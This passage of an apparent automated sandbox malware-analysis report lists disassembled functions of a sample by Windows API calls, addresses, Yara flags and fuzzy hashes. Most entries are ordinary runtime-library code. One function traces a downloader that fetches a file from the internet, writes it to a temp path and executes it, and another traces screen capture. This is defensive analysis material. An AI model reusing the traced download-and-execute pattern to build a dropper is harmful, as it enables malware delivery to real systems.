                                                                                                                                                                                                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004026EA
                                                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
                                                                                                                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00402731
                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00402738
                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0040273F
                                                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 0040274D
                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00402754
                                                                                                                                                                                                                                                                          • SetCapture.USER32(?), ref: 004027A1
                                                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 004027D5
                                                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 004027EB
                                                                                                                                                                                                                                                                          • GetKeyState.USER32(0000001B), ref: 004027F8
                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 0040280D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                                                                                                                                                                                                                                          • String ID: gya
                                                                                                                                                                                                                                                                          • API String ID: 2545303185-1989253062
                                                                                                                                                                                                                                                                          • Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                                                                                                                                                                                          • Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C
                                                                                                                                                                                                                                                                          Function 0042E6B2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$Info
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2509303402-0
                                                                                                                                                                                                                                                                          • Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                                                                                                                                                                                          • Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24
                                                                                                                                                                                                                                                                          Function 024BE919 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$Info
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2509303402-0
                                                                                                                                                                                                                                                                          • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                                                          • Instruction ID: 7470ea8a20f3ebfb693555afe86e06abf961ee06afc84aeba07f5b0c9472dc93
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1B1AE71A002099FDB62DF69C880BEFBBF5BF49304F64416EE499A7341DB75A841CB60
                                                                                                                                                                                                                                                                          Function 0043A5F8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 0043A63C
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A631
                                                                                                                                                                                                                                                                            • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                            • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A653
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A668
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A673
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A695
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A6A8
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A6B6
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A6C1
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A6F9
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A700
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A71D
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A735
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                                                                                                          • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                          • Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A
                                                                                                                                                                                                                                                                          Function 024CA85F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 024CA8A3
                                                                                                                                                                                                                                                                            • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C0F
                                                                                                                                                                                                                                                                            • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C21
                                                                                                                                                                                                                                                                            • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C33
                                                                                                                                                                                                                                                                            • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C45
                                                                                                                                                                                                                                                                            • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C57
                                                                                                                                                                                                                                                                            • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C69
                                                                                                                                                                                                                                                                            • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C7B
                                                                                                                                                                                                                                                                            • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C8D
                                                                                                                                                                                                                                                                            • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C9F
                                                                                                                                                                                                                                                                            • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9CB1
                                                                                                                                                                                                                                                                            • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9CC3
                                                                                                                                                                                                                                                                            • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9CD5
                                                                                                                                                                                                                                                                            • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9CE7
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA898
                                                                                                                                                                                                                                                                            • Part of subcall function 024C36D1: HeapFree.KERNEL32(00000000,00000000,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?), ref: 024C36E7
                                                                                                                                                                                                                                                                            • Part of subcall function 024C36D1: GetLastError.KERNEL32(?,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?,?), ref: 024C36F9
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA8BA
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA8CF
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA8DA
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA8FC
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA90F
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA91D
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA928
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA960
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA967
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA984
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA99C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                                                                                                          • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                          • Instruction ID: 4172addc0a296edae16ff608617903e37be4f25d1e727db2fdbd0689dff5eb02
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90318A396042189BEBB4AF3ED840B5BB7E9AF00754F31886FE449D6650DB70A8508BA4
                                                                                                                                                                                                                                                                          Function 00439A89 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                                                                                                          • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                                                                          • Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54
                                                                                                                                                                                                                                                                          Function 02492C5B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134filenetworksynchronizationCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02492C7E
                                                                                                                                                                                                                                                                          • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 02492C94
                                                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000105,?), ref: 02492CB0
                                                                                                                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02492CC6
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02492CFF
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02492D3B
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02492D58
                                                                                                                                                                                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 02492DCF
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00008000), ref: 02492DE4
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                                                                          • String ID: <
                                                                                                                                                                                                                                                                          • API String ID: 838076374-4251816714
                                                                                                                                                                                                                                                                          • Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                                                                                                                                                                                                          • Instruction ID: 87599a9e4dd94e7c45227a6dc8abfde4c5174a8f5a71db35cd1dcf5b97c66825
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F41407194021DAEEB20DF649C85FEA7BBCFF05745F0081EAA545E2150DFB09E858FA4
                                                                                                                                                                                                                                                                          Function 024AEEC2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,024AF228,00000004,024A7D87,00000004,024A8069), ref: 024AEEF9
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,024AF228,00000004,024A7D87,00000004,024A8069,?,024A8799,?,00000008,024A800D,00000000,?,?,00000000,?), ref: 024AEF05
                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(advapi32.dll,?,024AF228,00000004,024A7D87,00000004,024A8069,?,024A8799,?,00000008,024A800D,00000000,?,?,00000000), ref: 024AEF15
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00447430), ref: 024AEF2B
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF41
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF58
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF6F
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF86
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF9D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                          • String ID: advapi32.dll
                                                                                                                                                                                                                                                                          • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                                                          • Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                                                                                                                                                                                          • Instruction ID: 5094c6e2bcea075d3313d2a7846d9035d3d1bbbe03e89dfc1d5aca356291f4ab
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A72181B1904711BFE7106FB49C08A5ABFA8EF19B16F004A2BF556E3600CBBC94418FA4
                                                                                                                                                                                                                                                                          Function 024AEEC5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,024AF228,00000004,024A7D87,00000004,024A8069), ref: 024AEEF9
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,024AF228,00000004,024A7D87,00000004,024A8069,?,024A8799,?,00000008,024A800D,00000000,?,?,00000000,?), ref: 024AEF05
                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(advapi32.dll,?,024AF228,00000004,024A7D87,00000004,024A8069,?,024A8799,?,00000008,024A800D,00000000,?,?,00000000), ref: 024AEF15
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00447430), ref: 024AEF2B
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF41
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF58
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF6F
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF86
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF9D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                          • String ID: advapi32.dll
                                                                                                                                                                                                                                                                          • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                                                          • Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                                                                                                                                                                                          • Instruction ID: 67b99fa2203f2466764ca8cb5f16755750311b1da076590b33f09902df0306e7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 172192B1904711BFE7106F749C08A5ABFECEF09B16F004A2BF556D3600CBBC94418BA8
                                                                                                                                                                                                                                                                          Function 024A24A7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024A670B), ref: 024A24B6
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024A24C4
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024A24D2
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024A670B), ref: 024A2500
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 024A2507
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,024A670B), ref: 024A2522
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,024A670B), ref: 024A252E
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A2544
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024A2552
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                          • String ID: kernel32.dll
                                                                                                                                                                                                                                                                          • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                                                          • Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                                                                                                                                                                                          • Instruction ID: fb198a6187ad5218e4a28ca95cd2a7646b6af406393cbf0691321f886d3eb6d4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5611E5799003117FE711BB756C79A6B3BECAE15B12720052BFC02E3291EBB8D5009A6C
                                                                                                                                                                                                                                                                          Function 0042484D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104threadCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866
                                                                                                                                                                                                                                                                            • Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45
                                                                                                                                                                                                                                                                          • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00424898
                                                                                                                                                                                                                                                                          • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0042495C
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                                                                          • String ID: pContext$switchState
                                                                                                                                                                                                                                                                          • API String ID: 3151764488-2660820399
                                                                                                                                                                                                                                                                          • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                                                          • Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798
                                                                                                                                                                                                                                                                          Function 00419746 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
                                                                                                                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000), ref: 00419779
                                                                                                                                                                                                                                                                          • SafeRWList.LIBCONCRT ref: 00419798
                                                                                                                                                                                                                                                                            • Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
                                                                                                                                                                                                                                                                            • Part of subcall function 00417767: List.LIBCMT ref: 00417782
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004197B9
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 004197DD
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
